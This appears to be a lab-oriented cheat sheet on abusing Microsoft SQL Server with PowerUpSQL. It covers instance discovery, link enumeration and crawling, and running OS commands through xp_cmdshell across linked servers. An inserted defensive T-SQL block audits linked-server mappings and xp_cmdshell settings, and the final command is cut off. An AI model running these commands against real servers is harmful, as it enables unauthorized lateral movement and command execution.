MSSQL Abuse
Discovery (SPN Scanning)
Get-SQLInstanceDomain
• Check Accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
• Gather Information
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Look for links to remote servers
Get-SQLServerLink -Instance dcorp-mssql -Verbose
Or
select * from master..sysservers
Enumerating Database Links
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
Executing Commands
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'whoami'"
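To review the same links and xp_cmdshell exposure from the server side, the T-SQL below is an added audit example, not part of the original page or of PowerUpSQL. It uses only built-in catalog views and assumes a login allowed to read server-level metadata on the instance being checked.

```sql
-- Added audit example: run on each SQL Server instance being reviewed.

-- 1. Linked servers, their RPC/data-access settings and login mappings.
--    Rows with uses_self_credential = 0 and a remote_name map local callers
--    to a fixed remote login; review those first.
SELECT
    s.name                  AS linked_server,
    s.data_source,
    s.provider,
    s.is_data_access_enabled,
    s.is_rpc_out_enabled,
    CASE WHEN ll.local_principal_id = 0
         THEN N'(default mapping)'
         ELSE sp.name
    END                     AS local_login,
    ll.uses_self_credential,
    ll.remote_name,
    s.modify_date
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
       ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS sp
       ON sp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- 2. Whether xp_cmdshell is configured and currently active on this instance.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 3. Logins in the sysadmin role, i.e. those able to change the setting above.
SELECT m.name AS sysadmin_member, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r
  ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m
  ON m.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin'
ORDER BY m.name;
```

Repeat the queries on every server that appears as a link target, since each hop has its own mappings and configuration.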
Use PowerUpSQL.ps1
Step 1:
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Step 2:
Get-SQLServerLink -Instance dcorp-mssql -Verbose
Step 3:
Invoke-SQLOSCmd -Verbose -Instance